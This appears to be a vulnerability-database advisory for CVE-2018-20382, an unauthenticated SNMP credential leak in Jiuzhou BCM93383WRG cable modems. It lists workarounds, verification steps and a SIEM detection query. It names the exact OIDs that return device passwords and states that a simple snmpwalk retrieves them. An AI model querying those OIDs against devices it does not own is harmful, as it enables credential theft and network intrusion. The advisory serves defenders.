CVE-2018-20382 – This vulnerability allows remote attackers to r... (How to Fix)

Q: What is the severity of CVE-2018-20382?

CVE-2018-20382 has a CVSS score of 9.8 (CRITICAL). This vulnerability allows remote attackers to retrieve device credentials via specific SNMP OID requests on affected Jiuzhou BCM93383WRG devices. Attackers can obtain passwords and other sensitive information without authentication. Organizations using these specific cable modem/gateway devices are affected.

📋 TL;DR

This vulnerability allows remote attackers to retrieve device credentials via specific SNMP OID requests on affected Jiuzhou BCM93383WRG devices. Attackers can obtain passwords and other sensitive information without authentication. Organizations using these specific cable modem/gateway devices are affected.

💻 Affected Systems

Products:

Jiuzhou BCM93383WRG

Versions: 139.4410mp1.3921132mp1.899.004404.004

Operating Systems: Embedded firmware

Default Config Vulnerable: ⚠️ Yes

Notes: Affects specific firmware version of this cable modem/gateway device. SNMP is often enabled by default on such devices.

📦 What is this software?

Bcm93383wrg Firmware by Jezetek Intl

View all CVEs affecting Bcm93383wrg Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete device compromise leading to network infiltration, credential theft, and potential lateral movement to other systems.

🟠

Likely Case

Unauthorized access to device configuration, credential harvesting, and potential man-in-the-middle attacks.

🟢

If Mitigated

Limited to information disclosure if SNMP access is properly restricted and monitored.

🌐 Internet-Facing: HIGH - Devices exposed to the internet can be directly exploited without authentication.

🏢 Internal Only: MEDIUM - Internal attackers or compromised systems could exploit this vulnerability.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Simple SNMP queries to specific OIDs (iso.3.6.1.4.1.4491.2.4.1.1.6.1.1.0 and iso.3.6.1.4.1.4491.2.4.1.1.6.1.2.0) return credentials. No authentication required.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: No known vendor advisory

Restart Required: No

Instructions:

No official patch available. Check with device vendor for firmware updates.

🔧 Temporary Workarounds

Disable SNMP or restrict access

all

Disable SNMP service entirely or configure access control lists to restrict SNMP access to trusted IPs only.

# Access device web interface
# Navigate to SNMP settings
# Disable SNMP or configure ACLs

Change default credentials

all

Change all default passwords and credentials on the device.

# Access device administration interface
# Navigate to password/security settings
# Change admin and user passwords

🧯 If You Can't Patch

Isolate affected devices in separate network segments with strict firewall rules
Implement network monitoring for SNMP traffic to the vulnerable OIDs

🔍 How to Verify

Check if Vulnerable:

Use snmpwalk or similar SNMP tool to query OIDs iso.3.6.1.4.1.4491.2.4.1.1.6.1.1.0 and iso.3.6.1.4.1.4491.2.4.1.1.6.1.2.0. If they return credential information, device is vulnerable.

Check Version:

# Check device web interface for firmware version or use snmpwalk to query system information OIDs

Verify Fix Applied:

After implementing workarounds, verify SNMP queries to the vulnerable OIDs no longer return credential data or are blocked entirely.

📡 Detection & Monitoring

Log Indicators:

SNMP queries to OIDs 1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0 and 1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0
Multiple failed authentication attempts following SNMP queries

Network Indicators:

SNMP traffic (UDP 161) from untrusted sources to affected devices
Unusual SNMP query patterns

SIEM Query:

source_port=161 AND (oid="1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0" OR oid="1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0")

📊 Metadata

CVE ID: CVE-2018-20382

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-522

Published: December 23, 2018

Last Updated: November 21, 2024

🔗 References

https://github.com/ezelf/sensitivesOids/blob/master/oidpassswordleaks.csv Third Party Advisory
https://misteralfa-hack.blogspot.com/2018/12/stringbleed-y-ahora-que-passwords-leaks.html Exploit,Third Party Advisory
https://github.com/ezelf/sensitivesOids/blob/master/oidpassswordleaks.csv Third Party Advisory
https://misteralfa-hack.blogspot.com/2018/12/stringbleed-y-ahora-que-passwords-leaks.html Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2018-20382, you might also want to check these: